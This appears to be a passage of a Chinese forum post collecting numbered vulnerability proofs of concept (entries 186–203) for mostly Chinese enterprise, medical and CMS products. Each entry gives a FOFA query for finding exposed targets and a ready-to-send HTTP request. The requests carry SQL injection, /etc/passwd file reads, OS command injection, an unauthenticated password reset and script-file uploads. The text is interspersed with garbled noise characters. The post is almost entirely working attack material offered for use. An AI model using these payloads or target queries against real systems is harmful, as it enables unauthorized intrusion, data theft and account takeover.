" {# {0 E' S2 L3 nFOFA:app="REALOR-天翼应用虚拟化系统"
; a9 G7 g' W# q& { C7 g7 g# XGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1- O$ h1 O( d4 U
Host: host
( R* d0 a" Z: D n3 h6 S4 v) `7 X. P
$ H. t7 A) C* |. [ t/ E O! W
186. F-logic DataCube3 SQL注入
% _. S# Y; C) @CVE-2024-31750
# g2 P* H8 X* g# O0 YF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统" a7 N' L& z! P( s
FOFA:title=="DataCube3"- v: X- M9 B( M, p9 ~9 L9 h
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 Q& a4 t3 b: h2 u
Host: your-ip
/ c& C: m$ |/ n2 h1 n+ n3 f0 b/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.03 q1 ^% s# Q' o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
- i4 b$ r$ T8 x1 |7 L) VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ~ F& B7 b& D2 M1 n/ n* |: M; @; v- b
Accept-Encoding: gzip, deflate
4 y( p N( o3 C+ N# k4 tConnection: close
; P' X r3 k6 b5 a, dContent-Type: application/x-www-form-urlencoded n' @+ a3 u% S# q
) `" J, ?' u: Q5 i) kreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450# w/ b7 R9 o3 y! t
" q% v& {6 O' X" Y
8 ~+ x6 R6 g# @/ g, P7 W
187. Mura CMS processAsyncObject SQL注入
% W0 I& M3 `* B! \" h: JCVE-2024-32640
! a4 O3 q1 C( l& s0 F# KFOFA:"Mura CMS"4 h* P1 R/ o U4 @: ]
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.12 l& ~2 W* s$ w, h( y# a
Host: your-ip
7 G& E9 |2 A- t1 K% MContent-Type: application/x-www-form-urlencoded) H* H" X9 p' ]# [/ Q+ C3 T
$ j; ?/ i/ g& S% a/ g0 D' p* ~% H q" u
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 V+ |4 y. h' J: }
# W1 z5 q' ~5 G5 ]2 Z7 @# r. w; L6 G2 E, `. s3 H
188. 叁体-佳会视频会议 attachment 任意文件读取8 ]! W9 } ?! P' c# S# v
version <= 3.9.7
. Q" s# D \' }4 Q( O. G4 h @FOFA:body="/system/get_rtc_user_defined_info?site_id"
- o( ~* x9 m" W2 z1 gGET /attachment?file=/etc/passwd HTTP/1.1
5 k% j0 u6 r5 {( NHost: your-ip( l9 j/ T- b( q# K' y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ K: G9 t# H6 U& R1 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) _) W* ~& L1 ~6 ], r& R `) U/ y
Accept-Encoding: gzip, deflate
4 X+ G. Y L; e/ n1 t9 HAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
& c# `( l8 j3 P3 q- @9 a. w+ eConnection: close3 B% ^) J1 |6 l9 N
( J/ w' x, x3 E
' d$ s1 x2 y, b: X2 V
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
" g4 _ B$ }$ z& |& RFOFA:app="LANWON-临床浏览系统"
6 W; z+ ]. S" \. a) `GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ _, }& _+ [# S% ~6 dHost: your-ip) |( z: Z3 R& R8 O; l2 E6 d0 s$ { \
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) ]6 Z/ i: v' d0 S: A4 b HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' [+ J- k. f, d. s5 |4 YAccept-Encoding: gzip, deflate
2 G. \, p- U4 f( ]+ {7 W" w' MAccept-Language: zh-CN,zh;q=0.9
2 ~( w2 m4 m* kConnection: close& w$ A0 Z5 b* a- i d
( k: x- Z5 M! |: q5 `+ k1 P1 Z$ I4 h) N) k6 f2 z
190. 短视频矩阵营销系统 poihuoqu 任意文件读取# Z' T, S4 [! Z3 m Y9 p
FOFA:title=="短视频矩阵营销系统"
0 O6 ]2 z3 f0 xPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
; z) i3 r5 H- n) I" SHost: your-ip& t3 ~' O6 O- V# m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.363 K" o7 t q5 ~2 q7 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 z D4 {/ u7 e; Q5 G
Content-Type: application/x-www-form-urlencoded9 u; l$ H. E# `' u" Q) ]
Accept-Encoding: gzip, deflate1 S J2 W6 R% w" S+ [
Accept-Language: zh-CN,zh;q=0.97 `2 x6 ]7 j0 A
7 M* T. B5 B* H. {' f# L: {: @! kpoi=file:///etc/passwd
5 w! V+ X8 ]5 }0 x9 u, k2 I
& M& M6 p% r: E( {
: R8 O/ s. g: ]. ?2 K7 n8 C1 v191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入6 O5 u( g/ N# }! E
FOFA:body="/CDGServer3/index.jsp"" Y' Z/ F) E+ F' o' F
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
% s# ^0 ]( A% P7 W% {0 @" C& G* {Host: your-ip: J H# _6 u( h5 x# t( s% G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* Z/ e$ V" K4 D& z) HContent-Type: application/x-www-form-urlencoded# O4 M4 B4 R0 \9 j
, P$ X' l' s* [: e/ G) jcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
+ ?6 {, |+ |2 n2 K: ]9 t1 C$ S+ [5 _7 h1 m1 d F" p
& O6 u$ a! Q7 r. o+ R
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传+ u% U0 `( w) x! m B5 {7 X' E! b
FOFA:title="用户登录_富通天下外贸ERP"5 L% ?% x B* u2 e! R, @
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
9 M# p0 B, e6 [3 l$ THost: your-ip
" U7 {7 l) N4 ?+ u1 p- yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# F# v2 Q! X2 i/ v$ l$ XContent-Type: application/x-www-form-urlencoded
5 z5 ~. o( d0 N) T8 ~; x" ~; Y& E1 L+ m7 S) k7 i' t4 I+ d2 V0 M
8 q% {8 r( k# ], a' F7 l% H<% @ webhandler language="C#" class="AverageHandler" %>/ ?/ [$ j; ?+ O2 Z! C
using System;! x) d# ^7 V1 w* j
using System.Web;
, N6 ]7 Y7 B; {6 C8 k5 d" Q* }public class AverageHandler : IHttpHandler
8 m9 y! ^: n- e; i; C{
6 F4 H. |" j4 g$ Kpublic bool IsReusable
* R3 r! p) B2 N8 x& ?( Y{ get { return true; } }. k# ~: y; @" Z) v* p# J
public void ProcessRequest(HttpContext ctx)
" h) A2 [! H) U2 _2 v% H3 D{
) l- a( s7 s7 w+ t- O5 c8 rctx.Response.Write("test");
7 I! M4 d0 e* E7 C% \}7 i7 X b% U9 x0 t% d, x/ k+ Z
}
1 J4 F4 a) S+ H& i, x" _1 f3 X
- [! g$ d3 p- F$ ~
+ R" M: b/ f' c0 J! H: i3 x193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行, |5 a9 u$ `, c3 u/ ^
FOFA:body="山石云鉴主机安全管理系统"
) f8 W6 f% Y$ q; rGET /master/ajaxActions/getTokenAction.php HTTP/1.1, I& S9 F* i$ l& \+ E3 d3 Z
Host:
$ ~% P; ]3 f7 |; SCookie: PHPSESSID=2333333333333;% z$ g, A( v* J3 t
Content-Type: application/x-www-form-urlencoded
0 D N4 [2 }: _5 XUser-Agent: Mozilla/5.0
1 n, J; P4 s% |4 C! C' p) B. |8 W# e( q0 g" T0 G
4 B1 e. r& I- J( y: Y" S1 d2 O
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.10 N/ v& T4 f8 T# P
Host:
- e1 Q& x Z: F2 N& f: j ?: TUser-Agent: Mozilla/5.0
' j+ b4 N C: _8 n; _/ KAccept-Encoding: gzip, deflate [5 d/ T4 x9 X) |5 m- F1 r
Accept: */*
& L; E1 S* M3 b( W: v: j' R& DConnection: close% Q- \; I3 u5 d0 } q5 f* a
Cookie: PHPSESSID=2333333333333;( V7 F4 e' G! P
Content-Type: application/x-www-form-urlencoded9 B* D( [" ^8 x( r/ L
Content-Length: 849 _/ r: t5 ]+ j1 j" E
" o5 A: o/ A6 Xparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')3 j) h+ z8 O4 ^4 R" w) @% n
; R) c0 N' P! H6 h& j# H! ^: O! a5 R% |# y* @
GET /master/img/config HTTP/1.19 N& u' A v" ^- n3 o
Host:
\+ ^6 G9 M5 x( r/ KUser-Agent: Mozilla/5.0
$ i) h3 Z+ `* X. |/ C
# Q) J7 v; k- g+ R5 u; I8 j/ i$ ~& l( z" e
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传0 f {8 V4 ?3 K- _
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
N, c8 _" X" |- G- M! e; a3 y" ?+ @. p5 J
POST /servlet/uploadAttachmentServlet HTTP/1.1
- d9 f# v% B% ?. k5 y: j5 ZHost: host: C- v& H0 k8 U" d2 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
( Z3 c% C/ Q+ g4 J7 w. OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* E5 p4 e% v8 ~+ z% z. }6 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 }/ r3 ?; k r4 D" p
Accept-Encoding: gzip, deflate
8 Y# i7 r: J3 w+ Y, x! B U' TConnection: close
4 h, O6 Q, E9 I6 K, k) I) W6 rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk# Y) g7 \! V9 h( e* `! t' D, k
------WebKitFormBoundaryKNt0t4vBe8cX9rZk& ]/ v# E1 R7 z- z
7 I1 d' I& {0 @8 k
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp": J5 m {6 V& l1 }8 z8 M# u
Content-Type: text/plain# c& l7 d1 L( p3 Z, ]$ z
<% out.println("hello");%>
# ^; X( [: U A------WebKitFormBoundaryKNt0t4vBe8cX9rZk
) z, B9 V( H4 {7 N7 ]+ `! K; `Content-Disposition: form-data; name="json"+ Y9 b6 a( T( V( e* N ]
{"iq":{"query":{"UpdateType":"mail"}}}
$ m {" R" @. _, n7 B------WebKitFormBoundaryKNt0t4vBe8cX9rZk--5 S$ O9 W# F" l5 b/ |
7 b$ f! y6 A" H }
$ n/ h( g" x9 y195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
2 ^. J9 L4 q. {/ H7 [FOFA:title=="飞鱼星企业级智能上网行为管理系统
' b$ L; D$ e6 K' D0 l; ~( G4 A/ \1 ~POST /send_order.cgi?parameter=operation HTTP/1.1
& z9 y* W+ s) ]Host: 127.0.0.1! j% ^ z- M* R, \* D! f
Pragma: no-cache y) b5 O& l! n, j0 l9 }, Y
Cache-Control: no-cache
* p& i" {& L0 K9 j9 p( SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, ]# f& _* O6 ~% w# y
Accept: */*
4 `/ _: r( K( J3 MAccept-Encoding: gzip, deflate$ n% Z' q5 F& {1 p
Accept-Language: zh-CN,zh;q=0.91 e" u+ W& `' Q
Connection: close
; A1 ?3 J; I) P( a7 P$ ]Content-Type: application/x-www-form-urlencoded9 Y: Z( G$ b) h8 Y! g# l& O; H
Content-Length: 68
7 G* C- c6 E4 U. G2 F0 x
! V- S6 e8 b# w; }0 k3 g{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
0 |: Z$ S$ r' w8 y# q. o" q
) v+ ?/ \; i# n/ d m, F6 c Z
% I7 R% \1 B) H8 Y& p' Y/ _" K196. 河南省风速科技统一认证平台密码重置
: _7 W, \6 i. Z( E8 K3 KFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
2 V7 P% L5 n O$ Z: G/ APOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
6 C2 Z4 G n* |. dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
6 ~ M( a. q" h7 e6 @Content-Type: application/json;charset=UTF-8
+ ?, X% l, c- ]5 y' }/ `& {X-Requested-With: XMLHttpRequest. ?6 W T* S, H+ M2 k ~
Host:; }, c, `; o' r; n! M9 X
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.21 n* J( U4 n9 Q
Content-Length: 45
' ?# v3 u( U) R( W& P/ }! }7 r wConnection: close. S$ w# Y2 Q0 L4 N
7 k+ Q. P& \( X& a{"xgh":"test","newPass":"test666","email":""}+ k) O6 w0 u9 U' [% P, |
% ^8 p# F4 L+ U' ^- E
2 j& T) j ^ Y6 q4 {" w
0 t' G1 `) R$ f197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% w% [9 j- h: g" @& _
FOFA:app="浙大恩特客户资源管理系统"3 G+ t! t- G& _$ _- G
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1, l8 Z+ M: C3 {& f* ]6 A
Host:. }0 E& O0 R z4 I0 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.364 w; W/ ^% k8 g" e2 r1 G% l {8 y# r
Accept-Encoding: gzip, deflate/ e, G9 o' W) ?" m, K9 r1 T
Connection: close
$ { z% N4 a! Y; v3 B+ g, R) N# m1 J: O* N. I, I& F
' |1 C6 ~! T7 ?9 P% i
. i: `, j8 D- t: y& Y198. 阿里云盘 WebDAV 命令注入4 r7 T i% B5 C8 L s
CVE-2024-29640
# E0 _" q2 w8 M( ?GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
& f6 W M% o; s; r1 {) C/ `Cookie: sysauth=41273cb2cffef0bb5d0653592624cf645 X+ L' r4 _& Y& i6 v2 s8 ?
Accept: */** w; M5 n6 t5 T- t: f) G" u
Accept-Encoding: gzip, deflate
7 A, G+ j# [! J/ YAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.68 e( l4 m6 C, e5 E5 T+ a% P x
Connection: close J! Q8 w- r4 K Y, ]
- k. P0 R9 ?( u8 r! X
& G- V8 {( ?6 j0 e. Z. Q199. cockpit系统assetsmanager_upload接口 文件上传
& d8 H6 O- p X* H7 H* v
: L" r$ z- j' @1 w1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:: H$ e( n+ ^( r z4 f
GET /auth/login?to=/ HTTP/1.13 j0 \5 m( J$ Y: F% N- o
0 b) j u: \6 X2 x响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
+ Y# G# `+ p! ^. j& w. L3 T0 L1 E- h7 H+ ]
2.使用刚才上一步获取到的jwt获取cookie:, d1 _* o: E) L
, s3 E% c+ P* c4 k4 ]. X, rPOST /auth/check HTTP/1.16 ~' u0 B6 `6 f8 \! I. |- j% c3 d
Content-Type: application/json
7 E' _! |* t/ j+ Z
" w' s' g4 n5 f% t{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}$ V+ p: _3 a1 Y3 Q: F) ^
; y/ M5 n1 |( ]' _0 K
响应:200,返回值:
+ A2 I5 g: M( h- n+ I1 g @ oSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
' [7 H. Y6 @. b6 j$ k0 _Fofa:title="Authenticate Please!"
. [! |5 q# ]3 [4 L$ B6 \$ Z* q6 NPOST /assetsmanager/upload HTTP/1.15 I) X8 S; W! H8 S+ k
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
- H! y, P5 K% g2 l4 jCookie: mysession=95524f01e238bf51bb60d77ede3bea92
; n2 K3 t% a j# n$ W$ `- Y( [* g6 S
-----------------------------36D28FBc36bd6feE7Fb3
; ]$ i" @2 a! Q- K! eContent-Disposition: form-data; name="files[]"; filename="tttt.php"% r5 `/ @1 |& m" x) V
Content-Type: text/php2 V0 r/ j4 \3 f5 [$ A" X
$ p/ K$ J+ D5 \; @# n; E
<?php echo "tttt";unlink(__FILE__);?>6 \# z: ?. A2 m5 X
-----------------------------36D28FBc36bd6feE7Fb3
* o+ a' w, O4 Y, C7 ~Content-Disposition: form-data; name="folder"( m8 r" {# ~5 v% p" ]$ h
+ h4 u$ Z+ {: ?0 e; g
-----------------------------36D28FBc36bd6feE7Fb3--/ b- \1 n/ l$ I" _! P
5 K1 b: Z6 L3 W2 L5 x5 z4 w( |3 R8 C& Z, o# c4 J: A5 x$ G
/storage/uploads/tttt.php
* V$ a! W' z, a8 i( }7 Q
- t6 g+ `( y k0 n% A @200. SeaCMS海洋影视管理系统dmku SQL注入2 X8 B' Z4 l/ d1 |# E
FOFA:app="海洋CMS"! k& B2 ~9 `5 r: h# N \
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.11 B5 y0 C: M2 Z' `" f9 M1 c
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s/ X* L8 y; V6 U" @
Upgrade-Insecure-Requests: 18 F: g; |3 V* D( m' o
Cache-Control: max-age=0
' c f4 w1 c* J9 S+ k0 B8 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 G, K% L. E' p# d ~3 b) D
Accept-Encoding: gzip, deflate
. [0 ]# T. M3 G( N) ]Accept-Language: zh-CN,zh;q=0.9
) M9 ?. B: M; S% F% N% b
( ]2 o2 l: t% l; F1 H( t. F% ~( g' t
201. 方正全媒体新闻采编系统 binary SQL注入
2 h8 N2 p6 z, F% tFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统": L. k9 e$ W! |: j. |
POST /newsedit/newsplan/task/binary.do HTTP/1.1
" M' f# Z/ z* m3 v+ X3 fContent-Type: application/x-www-form-urlencoded
2 }$ \3 `3 D/ F* i/ n6 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, H% k. b! W2 J6 d5 mAccept-Encoding: gzip, deflate# F0 x8 G1 f2 R4 `( ^
Accept-Language: zh-CN,zh;q=0.99 J% l$ J' q5 y# ^+ U
Connection: close, t( W O* f' w |) R
' }3 x6 b& y7 W
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
* I( `* }) r! \' v
0 p+ s2 A; f% l; |/ x. b5 Q2 ?0 u* V8 ]' k5 N. {. U
202. 微擎系统 AccountEdit任意文件上传# y3 o7 d1 R1 P: m9 K$ Y& _$ G' D
FOFA:body="/Widgets/WidgetCollection/"
, M) ^" |+ n7 u' J% Q" c! n获取__VIEWSTATE和__EVENTVALIDATION值
" L5 ~' s+ }; E( y: b- q$ {GET /User/AccountEdit.aspx HTTP/1.1
$ O% ~3 Y+ H0 i6 x6 UHost: 滑板人之家' [+ y) [6 o5 X( p6 C. f4 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31 H; g( M# X& |1 s6 U7 \
Content-Length: 0
) v* c- J' A# ~* h" T- l$ |# n1 \: F
% P+ {( ? u! O7 m1 Q
替换__VIEWSTATE和__EVENTVALIDATION值
: ? o; j1 @4 s% K- Z- h& _& KPOST /User/AccountEdit.aspx HTTP/1.1 [) _! K; L3 v& z* e( p
Accept-Encoding: gzip, deflate, br
. F. @/ b% p+ d9 d" E1 X4 GContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687) M: `' q3 Q0 a! U5 J; Z
7 C% ~6 a) W, B" c: L. x% K- i-----------------------------786435874t38587593865736587346567358735687
( M# i, @. Q1 V+ k; R1 @) H" G; dContent-Disposition: form-data; name="__VIEWSTATE"
7 t! q, i' f7 v2 h+ m8 U! i* z+ A* |2 H
__VIEWSTATE% q6 g V, h* j
-----------------------------786435874t38587593865736587346567358735687, I+ J6 B$ N! F' G5 q' k0 j0 w% b
Content-Disposition: form-data; name="__EVENTVALIDATION" b2 Y' ]% c. q' l/ \/ q$ K3 ?
- h* K9 U2 I, Z" ?( S" p- Y__EVENTVALIDATION9 R0 s2 J, e4 c4 ^. ^! p5 s
-----------------------------786435874t38587593865736587346567358735687
6 V+ ]9 N* k8 vContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"! G! C" ]0 \/ Y% s8 y% @! b
Content-Type: text/plain
: p r7 @5 k5 Y
! h7 |; l# y' j0 |( W& [3 d" a1 WHello World!9 l) @* r, r: ?; X
-----------------------------786435874t385875938657365873465673587356877 S- e) N9 H4 ?9 k2 T1 W
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"+ Y; X: W) Q, E. `
9 H7 ^" _4 [, e+ _# ^6 J k$ G上传图片; a( z' w# d S8 [
-----------------------------786435874t38587593865736587346567358735687 L; }4 A, ^+ V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
8 T8 ^! L6 f; c3 o! I/ ]
; k9 P) G8 U4 x3 T2 r R5 M; T; `! J
-----------------------------786435874t38587593865736587346567358735687
; G% S8 V9 _: y3 ?; F/ J1 ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"! N( R2 X! D" {* L+ g- z
7 \3 ~0 y9 w8 q7 s4 T
) N' j1 Z- n3 D$ h0 R' C/ C7 k: e+ }-----------------------------786435874t38587593865736587346567358735687--
7 ]# T3 O: \7 u0 n/ c9 I/ }3 s4 p9 ]: f, ^& H! d
% ^# x0 f1 w0 _- x" g B/_data/Uploads/1123.txt
5 H: S( D3 o8 E& ?8 D$ r- p4 J+ ~* H8 H7 U. q( e: t+ ?. \
203. 红海云EHR PtFjk 文件上传9 F- ^3 I% I" C& H$ b5 \
FOFA:body="RedseaPlatform"
# Q" }$ U( q) V, O) ?! z' VPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1. y |4 G( ]" k, p' u2 E/ N' Q
Host: x.x.x.x7 A/ f6 H8 c$ B/ g: m
Accept-Encoding: gzip
; \( I n9 i9 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 Z5 m3 f, u) B1 [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys49 i) `- p4 v" Z
Content-Length: 210& h; D, L% B8 _$ s/ ]) m1 [" }. e
% O: a6 C+ U0 J. @/ B9 S------WebKitFormBoundaryt7WbDl1tXogoZys4
$ b$ l, G1 R9 ^- uContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
; k3 [4 z I9 |) o) ~Content-Type:image/jpeg
; }! f& w; A( z4 S, E/ G8 E7 |. P' f' W8 m0 c
<% out.print("hello,eHR");%>8 E4 V& F0 f* Y- D9 D4 D
------WebKitFormBoundaryt7WbDl1tXogoZys4--9 J: ~' [. O& _$ P" d
& b& f7 ^* Y @' B3 Y5 Z7 e0 c
' N* f7 k" i* t' K/ t2 z: U7 i
% _- x5 N$ j. m# t6 t% ^9 a P0 c, I+ z$ T" |" g9 \. Q! [: q8 X
5 E5 v) S- `) \' h* @) ~+ e5 v
, m+ j% E( f! ^) ^; Z5 U! Y! p; r |
发表于 2024-6-5 14:31:29
收藏
支持
反对